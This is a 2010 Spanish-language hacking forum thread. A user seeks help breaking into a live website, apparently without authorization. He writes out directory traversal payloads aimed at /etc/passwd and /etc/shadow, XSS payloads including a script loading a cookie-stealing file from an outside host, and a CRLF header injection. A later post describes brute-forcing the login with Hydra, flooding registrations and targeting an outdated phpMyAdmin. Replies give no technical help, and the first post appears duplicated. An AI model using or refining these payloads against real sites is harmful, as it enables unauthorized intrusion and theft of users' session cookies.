Directory traversal
3 participantes
Página 1 de 1.
Directory traversal
Hola, ya sé que soy nuevo por aquí y no sé si debería ir tan directo pero hí va:
La web es vuln a action=../../../../../../../../../../etc/passwd.png pero:
1.-
Nada, no muestra nada de esto:
action=../../../../../../../../../../proc/self/environ.png
No muestra nada cuando action=../../../../../../../../../../etc/shadow.png&id=4504
creo q solo es vuln pal passwd
asi k no me deja.
¿Hay algun otro metodo de explotar con directory taversal?
Si no se puede con directory traversal, la web es vulnerable tb a:
-ASP.NET Padding Oracle Vulnerability
-Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
Pero estas si q verdaderamente no se ni por donde empezar...
2.-
EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad="
Yo ya he usado anteriormente en otra web xss usando este codigo:
http://xxxxx.com/?action=best&srt=1>"><script src="http://xxxxx/cookie.js">&dir=1
El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras:
Vuln: action=best&dir=" onmouseover=prompt(970448) bad="
Modificado:
action=best&dir=" onmouseover=<script src="http://xxxxx/cookie.js"> bad="
action=best&dir=" onmouseover=<script>alert()</script> bad="
ETC...
Pero nada funciona.
Creo que tiene una especie de filtro (he intentado sobrepasarlos por ejemplo < = < ETC), por ejemplo el alert() solo funciona asi:
action=best&dir=" onmouseover=alert() bad="
3.-
Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection:
/download.php?id=
SomeCustomInjectedHeader:injected_by_wvs&t=1287498936
El caso es que no me aparece nada, ¿debería?
Haber si algun alma caritativa se atreve
asias.
La web es vuln a action=../../../../../../../../../../etc/passwd.png pero:
1.-
Nada, no muestra nada de esto:
action=../../../../../../../../../../proc/self/environ.png
No muestra nada cuando action=../../../../../../../../../../etc/shadow.png&id=4504
creo q solo es vuln pal passwd
asi k no me deja.
¿Hay algun otro metodo de explotar con directory taversal?
Si no se puede con directory traversal, la web es vulnerable tb a:
-ASP.NET Padding Oracle Vulnerability
-Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
Pero estas si q verdaderamente no se ni por donde empezar...
2.-
EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad="
Yo ya he usado anteriormente en otra web xss usando este codigo:
http://xxxxx.com/?action=best&srt=1>"><script src="http://xxxxx/cookie.js">&dir=1
El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras:
Vuln: action=best&dir=" onmouseover=prompt(970448) bad="
Modificado:
action=best&dir=" onmouseover=<script src="http://xxxxx/cookie.js"> bad="
action=best&dir=" onmouseover=<script>alert()</script> bad="
ETC...
Pero nada funciona.
Creo que tiene una especie de filtro (he intentado sobrepasarlos por ejemplo < = < ETC), por ejemplo el alert() solo funciona asi:
action=best&dir=" onmouseover=alert() bad="
3.-
Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection:
/download.php?id=
SomeCustomInjectedHeader:injected_by_wvs&t=1287498936
El caso es que no me aparece nada, ¿debería?
Haber si algun alma caritativa se atreve
asias.
Última edición por chusrubi2 el Sáb Oct 23 2010, 09:28, editado 2 veces
chusrubi2- Mensajes : 2
Fecha de inscripción : 21/10/2010
Re: Directory traversal
Bienvenido y gracias por visitar nuestro foro, yo no estoy muy puesto en el tema así que me ahorraré la recomendación porque puedo equivocarte, de todas formas tenemos dos compañeros que posiblemente sepan algo.
Re: Directory traversal
hola amigo. Bienvenido a nuestro foro. Ahora mismo estoy un poco ocupado en cuanto pueda te contesto algo!
ciyinet- Mensajes : 316
Fecha de inscripción : 23/06/2010
Re: Directory traversal
Va xDD que estoy tan desesperado que he intentado hacerle un brutus aet2 (además de con el hydra en ubuntu) al method post del login pero no me rula nu sé pq se me desconecta del target.
También he (hemos, un colega y yo) intentado programar un script para mirc para flooder de registros de usuario pero no funciona tampoco! XD
La web tiene ademas, en la raiz /sql el login para entrar a phpmyadmin, pero rusulta que es la version 2.11.2.1.También apache inferior a 2.0.61 y mysql 5.0.52 el caso es q no se explotar las vuln... o la mayoría de ellas son xss y me va a ser xungo pillarle por ahi.
PD:Si te apetece aclararme las dudas por msn seria mejor y mas rapido! XD
Haber si os mojais!
Salu2 y gracias.
También he (hemos, un colega y yo) intentado programar un script para mirc para flooder de registros de usuario pero no funciona tampoco! XD
La web tiene ademas, en la raiz /sql el login para entrar a phpmyadmin, pero rusulta que es la version 2.11.2.1.También apache inferior a 2.0.61 y mysql 5.0.52 el caso es q no se explotar las vuln... o la mayoría de ellas son xss y me va a ser xungo pillarle por ahi.
PD:Si te apetece aclararme las dudas por msn seria mejor y mas rapido! XD
Haber si os mojais!
Salu2 y gracias.
chusrubi2- Mensajes : 2
Fecha de inscripción : 21/10/2010
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.